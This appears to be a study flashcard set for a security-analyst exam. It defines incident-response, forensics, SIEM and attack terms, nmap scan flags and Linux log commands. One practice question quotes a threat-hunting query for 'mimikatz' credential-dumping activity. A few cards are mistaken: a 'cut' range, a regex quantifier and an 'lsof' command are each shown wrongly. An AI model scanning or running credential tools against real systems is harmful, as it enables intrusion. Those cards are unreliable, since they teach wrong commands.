an authentication protocol that can be implemented as special types of OAuth flows with precisely defined token fields (*OAuth is for authorization and OpenID Connect is used for authentication*)
Runbook
an automated version of a playbook that leaves clearly defined interaction points for human analysis
Spear Phishing
an email spoofing attack targeting a specific organization or individual by seeking unauthorized access to sensitive information
Passive Scan (Vulnerability Scanner Types)
an enumeration or vulnerability scan that analyzes only intercepted network traffic rather than sending probes to a target (commonly used for threat hunting)
Report Writing (post-incident activities)
an essential analyst skill that is used to communicate information about the incident to a wide variety of stakeholders (ex. executive summary)
SQL Event Logs
an event/error log that records events with fields like date, time, and the action taken, such as server startup, individual database startup, database cache clearing, and databases not starting or shutting down unexpectedly
Business Email Compromise (BEC)
an impersonation attack in which the attacker gains control of an employees account and uses it to convince other employees to perform fraudulent actions
Command and Control (C2)
an infrastructure of hosts and services with which attackers direct, distribute, and control malware over botnets
Python and Ruby (scripting tools)
an interpreted, high-level, general-purpose programming languages used heavily by cybersecurity analysts and penetration testers
Zeek (IDS/IPS Configuration tool)
an open-source IDS for UNIX/Linux platforms that contains a scripting engine which can be used to act on significant events (notices) by generating an alert or implementing some sort of shunning mechanism
Security Onion (IDS/IPS Configuration tool)
an open-source Linux-based platform (SIEM) for security monitoring, incident response, and threat hunting and it bundles together a lot of different tools like Snort, Suricata, Zeek, Wireshark and NetworkMiner with log management and incident management tools
Graylog
an open-source SIEM with an enterprise version focused on compliance and supporting IT operations and DevOps
Pacu
an open-source cloud penetration testing framework to test the security configuration of an AWS account
Scalpel
an open-source command line tool that is part of the Sleuth Kit that is used to conduct file carving on Linux and Windows systems
The Sleuth Kit *
an open-source digital forensics collection of command line tools and programming libraries for disk imaging and file analysis that interfaces with Autopsy as a graphical user-front end interface (* free open source solution)
OWASP Zed Attack Proxy (ZAP)
an open-source interception proxy and web application vulnerability assessment tool written in java (includes crawlers to automate the discovery links and content within a web application)
The Volatility Framework
an open-source memory forensics tool that has many different modules for analyzing specific elements of memory such as a web browser module, command prompt history module, and others
Snort (IDS/IPS Configuration tool)
an open-source software available for Windows and selected Linux distributions that can operate as an IDS or IPS mode
ScoutSuite
an open-source tool written in Python that can be used to audit instances and policies created on multicloud platforms, including AWS, Azure, and Google Cloud Platform
DevOps
an organizational culture shift that combines software development and systems operations by referring to the practice of integrating the two disciplines within a company (operations and developers can build, test, and release software faster and more reliably)
Rogue Devices
an unauthorized device or service, such as a wireless access point DHCP server, or DNS server, on a corporate or private network that allows unauthorized individuals to connect to the network
Post-Incident Activity (Incident Response Phases)
analyze the incident and responses to identify whether procedures or systems could be improved
nmap -sI (TCP Idle Scan)
another stealth method, this scan makes it appear that another machine (a zombie) started the scan to hide the true identity of the scanning machine
Response Code 500-599 (URL Analysis)
any code in this range indicates a server-side issue
Response Code 400-499 (URL Analysis)
any code in this range indicates an error in the client request
Response Code 300-399 (URL Analysis)
any code in this range indicates that a redirect has occurred by the server
What information should be recorded on a chain of custody form during a forensic investigation?
any individual who worked with evidence during the investigation
Shellcode
any lightweight code designed to run an exploit on the target, which may include any type of code format from scripting languages to binary code
Snowflake Systems
any system that is different in its configuration compared to a standard template within an infrastructure as code (IaC) architecture (lack of consistency leads to security issues and inefficiencies in support)
track (rule options)
applies a rate limiter to the rule by only triggering if the threshold of events pass over a certain duration (ex. if a user comes in once every minute, then flag it but if he comes in once every hour, then ignore it)
MAC filtering
applying an ACL to a switch or access point so that only clients with approved MAC addresses can connect to it
VM Introspection (VMI)
uses installed to the hypervisor to retrieve pages of memory for analysis
statistical deviation analysis
uses the concept of mean and standard deviations to determine if a data point should be treated as suspicious
Deceive
supply false information to distort the adversary's understanding and awareness (ex. DNS redirect, honeypot)
Saved State Files (Virtualization Forensics)
suspending VM memory files are loaded into a memory analysis tool
Why do we use a SPAN?
because network traffic must be captured and its data frames decoded before it can be analyzed
TTP (Tactics, Techniques, and Procedures)
behavior patterns that were used in historical cyber-attacks and adversary actions
Threat hunting and security monitoring must use ___________ techniques to identify infections
behavioral-based
User Acceptance Testing (UAT)
beta testing by the end users that proves a program is usable and fit-for-purpose in real-world conditions
Reputation data
blacklists of known threat sources, such as malware signatures, IP address ranges, and DNS domains
How do you prevent firewalking?
block outgoing ICMP status messages
How can WPS brute force attempts be mitigated?
by enabling rate-limiting for PIN authentications (*Important Note* ALWAYS disable WPS in your wireless networks)
Output Encoding
coding methods to sanitize output by converting untrusted output into a safe form where the input is displayed as data to the user without executing as code in the browser (mitigates against code injection and XSS attacks that attempt to use input to run a script)
lsof -u root -a p 1645
command that shows us all of the files that are currently open on this computer that were opened by the user root, and that is actively using the process number 1645
du /var/log
command that tells us how much space the log directory is using on this particular computer/host
Building Automation System (BAS)
components and protocols that facilitate the centralized configuration and monitoring of mechanical and electrical systems within offices and data centers
nmap -sU (UDP Scan)
conducts a scan by sending a UDP packet to the target and waiting for a response or timeout
nmap -sX (Xmas Scan)
conducts a scan by sending a packet with the FIN, PSH, and URG flags set to one
nmap -sN (Null Scan)
conducts a scan by sending a packet with the header bit set to zero
nmap -sF (FIN Scan)
conducts a scan by sending an unexpected FIN packet
nmap -p (Port Range)
conducts a scan by targeting the specified ports instead of the default of the 1,000 most commonly used ports
nmap -sT (TCP Connect)
conducts a three-way handshake scan by sending a SYN packet to identify the port state and then sending an ACK packet once the SYN-ACK is received
nmap -sS (TCP SYN)
conducts half-open scan by sending a SYN packet to identify the port state without sending an ACK packet afterwards (requires root/administrator access to perform)
DNS Event Logs
contains a log of all the different events for each time the DNS server handles a request to convert between a domain name and an IP address
Work Product Retention
contractual method of retaining (hiring) forensic investigators so that their analysis is protected from disclosure by the work product doctrine
Access Complexity (AC) (CVSS)
high (H) or low (L)
Listener/Collector (Data Normalization)
hosts are configured to push updates to the SIEM server using a protocol like syslog or SNMP
Attribution
identification and publication of an attacker's methods, techniques, and tactics as useful threat intelligence
Framework Core
identifies five cybersecurity functions (Identify, Protect, Detect, Respond, and Recover) and each function can be divided into categories and subcategories
User-Agent Field
identifies the type of application making the request, such as the web browser version or the client's operating system
Detect
identify the presence of an adversary and the resources at their disposal (ex. Web analytics, NIDS, Vigilant user, HIDS, Audit log)
When is Sinkholing better than Blackholing?
if you want to determine the cause of the DDoS attack
VirusTotal (EDR Configuration)
inspects items with over 70 antivirus scanners and URL/domain blacklisting services, in addition to a myriad of tools to extract signals from the studied content
patching
installing a set of changes to a computer program or its supporting data designed to update, to fix, or to improve it (process: scan, patch, scan)
*Important Note* Analysts should always have forensic workstations prohibited from accessing the
internet (because if it is connected, theres a possibility your forensic workstation could be compromised with malware, remote access trojan, and compromise your data integrity)
Correlation
interpreting the relationship between individual data points to diagnose incidents of significance to the security team
Disruption
interrupt an adversary's communications or frustrate or confuse their efforts (ex. in-line AV, DEP, NIPS)
Containment (Incident Response Phases)
limit the scope and magnitude of the incident by securing data and limiting impact to business operations and your customers
nmap -sL (List Scan)
lists the IP addresses from the supplied target range(s) and performs a reverse-DNS query to discover any host names associated with those IPs (similar to DNS lookup)
Insufficient Logging and Monitoring (Cloud Threats)
logs must be copied to non-elastic storage for long-term retention (*WARNING: SaaS may not supply access to log files or monitoring tools)
Processor Security Extensions
low-level CPU changes and instructions that enable secure processing (built into your microprocessor) 1. AMD: Secure Memory Encryption (SME) & Secure Encrypted Virtualization (SEV) 2. Intel: Trusted Execution Technology (TXT) & Software Guard Extensions (SGX)
_________ is expressed as a monetary value
magnitude
Obfuscated Malware Code
malicious code whose execution the malware author has attempted to hide through various techniques such as compression, encryption, or encoding to severely limit attempts to statically analyze the malware
Commodity Malware
malicious software applications that are widely available for sale or easily obtainable and usable
________ is still likely to leave metadata on the file system even if it is fileless
malware
Dropper
malware designed to install or run other types of malware embedded in a payload on an infected host (stage 1)
Volume-based Analysis
measures a metric based on the size of something, such as disk space used or log file size
flow (rule options)
matches a new or existing TCP connection OR matches regardless of the TCP connection state
*Important Note* While most of the Windows registry is stored on the disk, some keys (like HKLM/Hardware) are only stored in memory so you should analyze the Registry via a
memory dump
[ ] (regex syntax)
matches a single instance of a character within the brackets, such as [a-z] (lowercase letter), [A-Z] (uppercase letter), [0-9] (number), [a-zA-Z0-9] (finds me an uppercase, lowercase, or number as a single digit or single character from that range), [\s] (white space), or [\d] (single digit)
+ (regex syntax)
matches one or more occurrences and is called a quantifier, such as \d+ matching one or more digits
? (regex syntax)
matches one or none times, such as \d? matching zero or one digits
{ } (regex syntax)
matches the number of times within the curly braces, such as \d{3} matching three digits or \d{7-10} matching seven to ten digits
* (regex syntax)
matches zero or more occurrences, such as \d* matching zero or more digits
Document Matching (DLP Discovery and Classification)
matching based on an entire or partial document based on hashes
Watermarking
methods and technologies that apply a unique anti-tamper signature or message to a copy of a document
URL Modifier
modifiers that can be added to the results page to affect the results, such as &pws=0 (means dont give me personalized results), &filter=0 (means dont filter the results) , and &tbs=li:1 (means do not autocorrect my search items)
"Smash the Stack"
occurs when an attacker fills up the buffer with NOP (non-operation/blank space) so that the return address may hit a NOP and continue on until it finds the attacker's code to run
Service Defacement (Anomalous Activity)
occurs when an attacker gains control of a web server and alters the websites presentation
File carving ... (Virtualization Forensics)
of a virtual machine's virtualized hard drive can identify files in the unallocated and slack space of disk images
________ and ________ is used to interpret data from different formats and standardize them into a single format for analysis and processing (Data Normalization)
parsing + normalization
Web Application Firewall
protects web applications from a variety of application layer attacks such as XXS, SQL injection, code injection, etc
Continuous Diagnostics and Mitigation (CDM)
provides US government agencies and departments with capabilities and tools to identify cybersecurity risks on an ongoing basis, prioritize these risks based upon potential impacts, and enable cybersecurity personnel to mitigate the most significant problems
DomainKeys Identified Mail (DKIM)
provides a cryptographic authentication mechanism for mail utilizing a public key published as a DNS record
Google Hacking Database (GHDB)
provides a database of search strings optimized for locating vulnerable websites and services
Degrade
reduce an adversary's capabilities or functionality, perhaps temporarily (ex. Queuing, Tarpit, Quality of Service)
Physical Network (Network Architectures)
refers to the cabling, switch ports, router ports, and wireless access points that supply cabled and wireless network access and connectivity (also includes physical security controls that are important in protecting your physical network architecture)
recycled threats
refers to the process of combining and modifying parts of existing exploit code to create new threats that are not as easily identified by automated scanning
Eradication & Recovery (Incident Response Phases)
remove the cause of the incident and bring the system back to a secure state
Destory
render an adversary's resources permanently useless or ineffective
How do you prevent CSRF attacks?
request user-specific tokens in all form submissions
Stack
reserved area of memory where the program saves the return address when a function call instruction is received
What is a key indicator of malicious activity?
resource consumption
HEAD (URL Analysis)
retrieves the headers for a resource only and ignores the body
cut -c5 syslog.txt
returns only the fifth character in each line from the syslog.txt file
cut -c5-5 syslog.txt
returns only the fifth through tenth characters in each line from the syslog.txt file
sort syslog.txt
returns the contents of the syslog.txt file in alphabetical order (a-z)
sort -n syslog.txt
returns the contents of the syslog.txt file in numerical order (0-9)
sort -k2 syslog.txt
returns the contents of the syslog.txt file in order based on the column specified, in this case the second column
sort -t "," -k2 syslog.txt
returns the contents of the syslog.txt file in order based on the column specified, such as the second column, while delimiting the columns using comma separated values
sort -r syslog.txt
returns the contents of the syslog.txt file in reverse alphabetical order (z-a)
cut -d " "-f1-4 syslog.txt
returns the first four entries of each line as delimited by the " " (space character)
Reflected, non-persistent, and persistent XSS attacks occur as ________ scripting attacks
server-side
Always use ________ _______ to conduct credentialed scans, not local administrative privileges
service accounts
Federal Information Security Management Act (FISMA)
sets forth the requirements for federal organizations to adopt information assurance controls
Sarbanes-Oxley Act (SOX)
sets forth the requirements for the storage and retention of documents relating to an organization's financial and business operations, including the type of documents to be stored and their retention periods (applies to publicly traded companies)
Gramm-Leach-Bliley Act (GLBA)
sets forth the requirements that help protect the privacy of an individual's financial information that is held by financial institutions and others
Health Insurance Portability and Accountability Act (HIPAA)
sets forth the requirements that help protect the privacy of an individual's health information that is held by healthcare providers, hospitals, and insurance companies
You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and causes an impact on the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?
syslog
The ____ command allows you to see the 10 most recent log entries in a file
tail
Risk Identification
takes place by evaluating threats, identifying vulnerabilities, and assessing the probability of an event affecting an asset or process
attackers can use _________ techniques to bury their attacks within the network noise
sparse attack (trend analysis can be used to identify these attacks)
Adversaries often use _______ _______ to reduce packets sizes and hide in the noise of the other network traffic
sparse delivery
IOC for Data Exfiltration Using HTTP
spikes in requests to PHP files or other scripts, and unusually large HTTP response packets
Maximum Tolerable Downtime (MTD) *
the longest period of time a business can be inoperable without causing irrevocable business failure
Recovery Point Objective (RPO) *
the longest period of time that an organization can tolerate lost data being unrecoverable (focused on how long you can be without your data)
Zones
the main unit of a logically segmented network (using ACLs) where the security configuration is the same for all hosts within it (e.g, DMZ)
Data Acquisition
the method and tools used to create a forensically sound copy of data from a source device, such as system memory or a hard disk
Client-based Error Codes
status codes in the 400 range
Server-based Error Codes
status codes in the 500 range
Covert Channels can be created using different ________ and ________ methods
storage, timing
Agent-based Scanning
the vulnerability scanning is conducted using a software application installed locally on each target
Server-based Scanning (Vulnerability Scanner Types)
the vulnerability scanning is launched from one or more scanning servers against the targets (ex. Nessus)
sid and rev (rule options)
this is going to be an ID rule, a Snort ID (sid) OR its going to be rev, which is the version (the revision number of that rule)
Port 3306 (TCP)
MySQL (MySQL database connection)
Port 4500 (UDP port)
NAT-T-IKE (used to set up IPsec traversal through a NAT gateway)
systemctl
Linux command that can list and monitor the startup processes using the appropriate control for the init daemon (startup process that happens every time you start the Linux system)
top
Linux command that creates a scrollable table of every running process and is constantly refreshed so that you see the most up-to-date statistics
faillog (new accounts)
Linux command that displays only authentication failures
chmod
Linux command that is used to modify permissions for files
chown
Linux command that is used to modify the owner of a file
free
Linux command that outputs a summary of the amount of used and freely available memory on the computer
lastlog (new accounts)
Linux command that retrieves the log-on history from the /var/log/lastlog file and displays the account name, the TTY, the remote host, and the last time the user was logged in
who (new accounts)
Linux command that shows what user accounts are logged in, what terminal teletypes (TTYs) they have active for each running process, and what date/time they logged in (useful for adversary hunting)
du
Linux tool enables you to retrieve how much disk space each directory is using based on the specified directory
lsof
Linux tool that retrieves a list of all files currently open on the OS (can quickly get a list of all resources a process is currently using)
df
Linux tool that retrieves how much disk space is being used by all mounted file systems and how much space is available for each
how do you create a search query to send an alert if multiple user log-on failures occur within one hour from a single account
Select (user) Where (Error.LogonFailure > 3 AND LogonFailure.User AND Duration < 1 hour) Sorted By (date, time)
A company's NetFlow collection system can handle up to 2 Gbps. Due to excessive load, this has begun to approach full utilization at various times of the day. If the security team does not have additional money in their budget to purchase a more capable collector, which of the following options could they use to collect useful data?
enable sampling of the data
Collection (Forensic Procedures)
ensure authorization to collect evidence is obtained (e.g, warrant), and then document and prove the integrity of evidence as it is collected
logging
ensure that scanning and monitoring/log retrieval systems are functioning properly following the incident
Identification (Forensic Procedures)
ensure the scene is safe, secure the scene to prevent evidence contamination, and identify the scope of evidence to be collected
A cybersecurity analyst is conducting proactive threat hunting on a network by correlating and search the Sysmon and Windows Event logs. The analyst uses the following query as part of their hunt: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Query: "mimikatz" NOT "EventCode=4658" NOT "EventCode=4689" EventCode=10 | stats count by _time, SourceImage, TargetImage, GrantedAccess -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Based on the query above, which of the following potential indicators of compromise is the threat hunter relying on?
unauthorized software
Scope (S) (CVSS)
unchanged (U) or changed (C)
a ________ rootkit is able to gain complete control over the system
kernel mode (more dangerous)
Segmentation Containment
- a mitigation strategy that achieves the isolation of a host or group of hosts using network technologies and architecture - uses VLANs, routing/subnets, and firewall ACLs to prevent communication outside the protected segment (ex. sandboxing, honeypots) - can be used to reroute adversary traffic as part of a deception defensive capability
Isolation Containment
- a mitigation strategy that involves removing an affected component from whatever larger environment it is apart of - ensure there is no longer an interface between the affected component and your production network or the Internet (ex. airgap)
Kill Chain (Attack Framework)
- a model developed by Lockheed Martin that describes the stages by which a threat actor progresses a network intrusion - 7 stages (Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, Actions on Objectives)
Behavioral Analysis
- a network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences - generates an alert whenever anything deviates outside a defined level of tolerance from a given baseline (outliers)
Anomaly Analysis
- a network monitoring system that uses a baseline of acceptable outcomes or event patterns to identify events that fall outside the acceptable range - generates an alert on any event or outcome that doesnt follow a set pattern or rule
Event Logs
- logs created by the operating system on each client or server to record how users and software interact with the system - event logs provide the name of the event, details of any errors, the event ID, the source of the event and a description of what the warning/error means
Preparation (Incident Response Phases)
- make the system resilient to attack by hardening systems, writing policies and procedures, and setting up confidential lines of communication - preparing for an incident response involves documenting your procedures, putting resources and procedures in place, and conducting training
Industrial Control Systems (ICS)
- a network that manages embedded systems (one plant) - used for electrical power stations, water suppliers, health services, telecommunications, manufacturing, and defense needs - manages the process automation by linking together PLCs using a fieldbus to make changes in the physical world (valves, motors, etc)
Distributed Reflection DoS (DRDoS) Attack
- a network-based attack where the attacker dramatically increases the bandwidth sent to a victim during a DDoS attack by implementing an amplification factor - occurs when the adversary spoofs the victims IP address and tries to open connections with multiple servers
Lateral Movement
- a technique to progressively move through a network to search for the key data and assets that are ultimately the target of an attack campaign - identifying irregular peer-to-peer communication can identify lateral movement
Supervisory Control and Data Acquisition (SCADA)
- a type of industrial control system (ICS) that manages large-scale, multiple-site devices and equipment spread over a geographic region (multiple plants) - typically run as software on ordinary computers to gather data from and manage plant devices and equipment with embedded PLCs
Reverse Proxy
- a type of proxy server that protects servers from direct contact with client requests - logs from a reverse proxy can be analyzed for indicators of attack or compromise, such as malicious code in HTTP request headers and URLs
Port 23 (TCP)
Telnet (an unsecure remote administration interface)
How can you detect privilege escalation? *
- by monitoring authentication and authorization systems (5 things to look for below) 1. unauthorized sessions 2. failed log-ons 3. new accounts 4. guest account usage 5. off-hours usage
Blackholing *
- can be used to stop a DDoS attack at the routing layer by sending traffic to the null0 interface - useful against Dark Nets - redirect all Dark Nets to a black hole until they are needed for business operations
Live Acquisition (System Memory Image Acquisition )
- capturing the contents of memory while the computer is running using a specialist hardware/software tool (e.g, Memoryze from FireEye and F-Response from TACTICAL) - generates a snapshot of data that is changing second-by-second
Act (with Example)
- carry out the decision and related changes that need to be made in response to the decision - (ex.) the user's system is isolated by an incident responder and then begin to observe again for additional indicators
Hashcat
- a command-line tool used to perform brute force and dictionary attacks against password hashes - relies on GPUs (graphical processing units) instead of CPUs to perform brute force cracking more quickly
Responder
- a command-line tool used to poison responses to NetBIOS, LLMNR, and MDNS name resolution requests in an attempt to perform a MiTM attack - designed to intercept LLMNR and NBT-NS requests and return the attacker's host IP as the name record
Modbus (ICS/SCADA)
- a communications protocol used in operational technology (OT) networks - gives control servers and SCADA hosts the ability to query and change the configuration of each PLC
Decide (with Example)
- makes suggestions towards an action or response plan while taking into consideration all of the potential outcomes - (ex.) the user's system was compromised, malware was installed by the attacker, and we should isolate the system
data submitted via a URL is delimited by the ___ character (URL Analysis)
?
Cousin Domains
A DNS domain that looks similar to another name when rendered by a Mail User Agent (MUA)
What are 2 ways SQL Injection attacks can be prevented/mitigated?
*input validation* and using least privilege when accessing a database
Sysinternals
- A suite of tools designed to assist with troubleshooting issues with Windows, and many of the tools are suited to investigating security issues - Process Explorer (one of the tools) can filter out legitimate activity (known-good) to look for signs of anomalous behavior (comparing suspicious events to your baseline)
Software-Defined Networking (SDN) *
- APIs and compatible hardware allowing for programmable network appliances and systems (essentially taking our physical networks and virtualizing them) - allows for automatic deployment and disaster recovery 1. control plane (makes decisions about how traffic should be prioritized and secured, and where it should be switched) 2. data plane (handles the actual switching and routing of traffic and imposition of ACLs for security) 3. management plane (monitors traffic conditions and network status)
Improper Key Management (Cloud Threats)
- APIs should use secure authentication and authorization such as SAML or OAuth/OIDC before accessing data - delete unnecessary keys and regenerate new keys when moving into the production environment - ensure that hardening policies are in place for your servers and workstations (*WARNING: do NOT hardcode or embed a key into the source code*)
Port 53 (UDP)
- DNS - uses UDP for DNS queries
Port 53 (TCP)
- DNS (domain name system - translates our IPs to names and our names to IPs) - uses TCP for zone transfers
Observe (with Example)
- Identify the problem or threat and gain an overall understanding of the internal and external environment - (ex.) An alert in your SIEM has been created due to an employee clicking on a link in an email
Orient (with Example)
- Involves reflecting on what has been found during observations and considering what should be done next - (ex.) identify the user's permissions, any changes identified in the user's system, and potential goals of attacker
ps
- Linux command that lists the attributes of all current processes - this command shows only processes started by the current user by default - * ps -A or ps -e will provide a full list of all running processes for all users *
OWASP *
- Open Web Application Security Project's security framework for secure application development - a charity and community that publishes a number of secure application development resources
What is the difference between SOA and Microservices?
- SOA allows applications to be built from services with interdependencies - Microservices are capable of being developed, tested, and deployed independently (easily scalable without interdependencies)
NetFlow
- a Cisco-developed means of reporting network flow information to a structured database - doesn't show the full packet captures so you will not have a complete record of whats happening
Golden Tickets
- a Kerberos ticket that can grant other tickets in an Active Directory environment - can grant administrative access to other domain members and domain controllers - allow attackers to laterally move across the entire domain with ease (*Important Note* administrators should change the krbtgt account password regularly)
Alien Vault and OSSIM (Open-Source Security Information Management)
- a SIEM solution originally developed by Alien Vault, now owned by AT&T, and rebranded as AT&T Cybersecurity - OSSIM can integrate other open-source tools, such as Snort IDS and OpenVAS vulnerability scanner, and provide an integrated web administrative tool to manage the whole security environment (all in one solution)
Maturity Model
- a component of an ESA (enterprise security architecture) framework that is used to assess the formality and optimization of security control selection and usage and address any gaps (5 levels) 1. Level 1 - Initial (highly reactive in nature) 2. Level 2 - Managed (prepare to mitigate through risk assessments) 3. Level 3 - Defined (defined policies and procedures) 4. Level 4 - Quantitatively Managed (management oversight of risks) 5. Level 5 - Optimizing (fully proactive risk-driven approach)
Hardware Root of Trust (ROT)
- a cryptographic module embedded within a computer system that can endorse trusted execution and attest to boot settings and metrics (e.g, TPM) - essentially is used to scan the boot metrics and OS files to verify their signatures, and then uses it to sign the report (digital certificate embedded inside your processor or firmware)
Threat Hunting
- a cybersecurity technique designed to detect presence of threats that have not been discovered by normal security monitoring - steps to threat hunting: analyze network traffic, analyze the executable process list, analyze other infected hosts, identify how the malicious process was executed - threat hunting consumes a lot of resources and time to conduct but can yield a lot of benefits - benefits include: improve detection capabilities, integrate intelligence, reduce attack surface, block attack vectors, identify critical assets
EnCase (Forensic Tools)
- a digital forensics case management product created by Guidance Software with built-in pathways or workflow templates that show the key steps in many types of investigations (used for both data acquisition and analysis) - file format = .e01 - also supports .dd format (disk duplication file - industry standard)
The Forensic Toolkit (FTK)
- a digital forensics investigation suite by AccessData that runs on Windows Server or server clusters for faster searching and analysis due to data indexing when importing evidence - file format = .aff - also supports .dd format
Controller Area Network (CAN)
- a digital serial data communications network used within vehicles (airplanes, cars, trains) - the primary external interface is the Onboard Diagnostics (OBD-II) module
Web Application Firewall (WAF)
- a firewall designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks - used to prevent web-based exploits and vulnerabilities like SQL injection, XML injection, and cross-site scripting (XSS) attacks
Adversary Capability
- a formal classification of resources and expertise available to a threat actor
Prescriptive Framework
- a framework that stipulates control selection and deployment - driven by regulatory compliance
Network Access Control (NAC) *
- a general term for the collected protocols, policies, and hardware that authenticate and authorize access to a network at the device level (best option of the 3) - provides the means to authenticate users and evaluate device integrity BEFORE a network connection is permitted - relies on 802.1X
Zeek (Bro)
- a hybrid tool that passive monitors a network like a sniffer and only logs data of potential interest - essentially, its going to be sampling that data just like NetFlow does but when it finds something interesting its going to log the entire thing - this helps reduce our storage and processing requirements + gives us the ability to have all this data into one single format - performs normalization of the data using JSON
Application Programming Interface (API)
- a library of programming utilities used to enable software developers to access functions of another application - allows for the automated administration, management, and monitoring of a cloud service and applications (commonly use REST or SOAP as their frameworks)
HTTP Access Logs
- a log containing HTTP traffic that encountered an error or traffic that matches some pre-defined rule set - relevant information is recorded in the common log format (CLF) or W3C extended log file format - status codes of responses indicate if an error was caused by the client or server
Cross-Site Scripting (XSS)
- a malicious script hosted on the attacker's site or coded in a link injected onto a trusted site designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones - breaks the browser's security model since browsers assume scripting is safe (*XSS is a powerful input validation exploit*)
Beaconing
- a means for a network node to advertise its presence and establish a link with other nodes (gives an attacker the ability to establish a C2 server to communicate with malware on the infected host) - malicious beaconing usually takes the form of a simple ping or heartbeat to verify the bot is still alive in the botnet (can happen at regular intervals or different times) - beaconing can be used legitimately, such as beacon management frame being sent by a wireless access point for normal network communications (NTP servers, auto update and patching systems, cluster services) (- *Exam Tip: traditional beaconing occurs in regular intervals, such as every 5 seconds, every 15 minutes, every day, etc)
Black Hole *
- a means of mitigating DoS or intrusion attacks by silently dropping (discarding) traffic - more effective than using an ACL and a firewall - can be done at the firewall level (requires more processing power) or router level (more efficient method)
Percent Encoding
- a mechanism to encode 8-bit characters that have specific meaning in the context of URLs, also known as URL encoding - whenever you see percent encoding typically something is hidden there and further investigation is needed
DNS Zone Transfer
- a method of replicating DNS databases across a set of DNS servers that is often used during the reconnaissance phase of an attack - a zone transfer can be used to collect DNS information about your servers and give it to an attacker to plan further attacks
Heuristic Analysis
- a method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious - uses machine learning to alert on behavior that is similar enough to a signature or rule
Trusted Foundry
- a microprocessor manufacturing utility that is part of a validated supply chain (one where hardware and software does not deviate from its documented function) - created and operated by the DoD
Pass the Hash
- a network-based attack where the attacker steals hashed user credentials and uses them as-is to try to authenticate to the same network the hashed credentials originated on - it is possible to present the hash without cracking the original password to authenticate to network protocols such as SMB and Kerberos - commonly used to elevate privileges (when pass the hash is used on a local workstation, then an attacker can gain local admin privileges) - (*Important Note* domain administrative accounts should ONLY be used to logon to domain controllers to prevent pass the hash form exploiting your domain)
Packet Sniffer
- a piece of hardware or software that records data from frames as they pass over a network media using methods such as a mirrored port or tap device - make sure a network sniffer is placed inside a firewall or close to an important server - you can deploy multiple sniffers within your network - tcpdump and Wireshark
Staging Areas (Disk and File System)
- a place where an adversary begins to collect data in preparation for data exfiltration, such as temporary files and folders, user profile locations, data masked as logs, alternate data streams (ADS), or in the recycle bin - data is often compressed and encrypted in the staging area (IOC#1)
Malicious Process
- a process executed without proper authorization from the system owner for the purpose of damaging or compromising the system - malware code will often be injected into a host process by making it load the malware code as a dynamic link library (DLL) within Windows - malware often uses injection into Linux shared libraries (Shared Objects or .so files)
Federation
- a process that provides a shared login capability across multiple systems and enterprises - allows the company to trust accounts created and managed by a different network
System-on-Chip (SoC) (Embedded System)
- a processor that integrates the platform functionality of multiple logical controllers onto a single chip (combines multiple PLCs into one chip) - power efficient and used with embedded systems
Burp Suite
- a proprietary interception proxy and web application assessment tool - allows for the automated scanning of vulnerabilities and crawling of an application to discover content, while providing tools for automating the modification of requests and insertion of exploits
Syslog (Mac or Linux)
- a protocol enabling different appliances and software applications to transmit logs or event records to a central server - follows a client-server model and is the de facto standard for logging of events from distributed systems across the network - syslog can refer to the protocol, the server, or the log entries themselves - runs on port 514 (UDP) over TCP/IP
NIST Cybersecurity Framework
- a risk-based framework that is focused on IT security over IT service provision - covers three main areas: framework core, implementation tiers and framework profiles
HTTP Method (URL Analysis)
- a set of request methods to indicate the desired action to be performed for a given resource - a request contains a method, a resource, a version number, the header, and the body of the request
Conditional Analysis
- a simple form of correlation performed by a machine by using signature detection and rules-based policies (IF x AND y OR z) - drawback is this type of analysis creates large numbers of false positives and cannot find zero-day or new TTPs
Endpoint Protection Platform (EPP) (endpoint protection tool)
- a software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption - focused on signature-based detection
Endpoint Detection and Response (EDR)
- a software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats - focused on behavioral and anomaly analysis
Data Loss Prevention (DLP)
- a software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks (made up of 3 components) 1. policy server (used to configure classification, confidentiality and privacy rule sets, logging + reporting) 2. endpoint agents (used to enforce policy on client computers) 3. network agents (scans network activity and protects things from leaving your network)
Heap Overflow
- a software vulnerability where input is allowed to overwrite memory locations within the area of a process' memory allocation used to store dynamically-sized variable - can overwrite those variables and possibly allow arbitrary code execution
SIEM
- a solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications (detection and monitoring capabilities) - helps us correlate events
Attack Vector
- a specific path by which a threat actor gains unauthorized access to a system - 3 main areas to consider: cyber, human, physical
Trusted Platform Module (TPM)
- a specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information - part of your system that allows you to have the ability to ensure that when your booting up, it is done securely and we can take those reports and digitally sign them
STIX (Structured Threat Information eXpression - Indicator Management) *
- a standard terminology for IoCs and ways of indicating relationships between them that is included as part of the OASIS Cyber Threat Intelligence (CTI) framework - JSON format (attributes and values) - STIX is build from high-level STIX domain objects (SDOs) that contain multiple attributes and values
Aircrack-ng Suite (Wireless Assessment Tools)
- a suite of utilities designed for wireless network security testing (4 tools inside of it) 1. airmon-ng 2. airodump-ng 3. aireplay-ng 4. aircrack-ng
User and Entity Behavior Analytics (UEBA) *
- a system that can provide automated identification of suspicious activity by user accounts and computer hosts - starts with a good baseline and then compares anything that goes outside that baseline as something suspicious - UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning (heavily focuses on analytics)
URL Analysis
- activity that is performed to identify whether a link is already flagged on an existing reputation list, and if not, to identify what malicious script or activity might be coded within it - need to use the right tools to be able to: resolve percent encoding, assess redirection of the URL, show source code for scripts in URL - all of this needs to performed in a sandbox environment so you don't infect your own machine
How do you mitigate false positives when performing a vulnerability scan?
- adjust scans to a more appropriate scope - create a new baseline for a heuristic scan - add application to exception list - vulnerability exists but isn't exploitable
